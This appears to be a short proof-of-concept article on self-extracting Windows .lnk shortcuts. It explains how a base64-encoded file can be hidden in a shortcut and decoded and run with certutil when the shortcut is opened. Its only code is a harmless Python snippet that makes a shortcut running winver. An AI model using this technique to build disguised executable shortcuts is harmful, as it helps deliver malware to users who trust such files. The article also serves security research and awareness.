Self-extracting Windows shortcuts PoC

Windows shortcut files, also known as .lnk files, are commonly trusted by users because they are frequently used to quickly access files and programs on a computer. However, it is important to exercise caution when using .lnk files as they can potentially be harmful. Shortcut files can contain malicious payloads that, when opened, can execute code that can compromise the security of the system. This is because the .lnk file, when clicked, automatically runs the command specified within it without prompting the user for confirmation. Additionally, .lnk files can be disguised to appear as legitimate files, making it difficult for users to differentiate between safe and harmful shortcuts. It is important to be vigilant and only open .lnk files from trusted sources to protect against potential security threats.

This paper describes a method for embedding a file within a shortcut file, such that when the shortcut is executed, the contained file is extracted and also executed. The method involves the use of the "Certutil" tool, which is preinstalled on Windows systems and is commonly utilized by attackers for malicious purposes. In this case, the "Certutil" tool will be used to decode a base64 encoded file that is stored within the shortcut file itself. This allows the contained file to be extracted and run when the shortcut is opened.

In order to use Python to create and configure Windows shortcuts, it is necessary to install the pypiwin32 and winshell libraries. Once these libraries are installed, Python can be used to create a shortcut file that will execute a command line prompt when opened. The following code snippet demonstrates how this can be accomplished:

with winshell.shortcut("C:\Temp\shortcut.lnk") as shortcut:
    shortcut.path = "%COMSPEC%"
    shortcut.arguments = "/c winver"

This example demonstrates how to use a shortcut file to open a new command line prompt and execute the winver command, displaying information about the version of Windows that is installed on the system.

All content on this website is protected by a disclaimer. Please review it before using our site

Jan. 2, 2023, 3:04 p.m. | By Jean-Pierre LESUEUR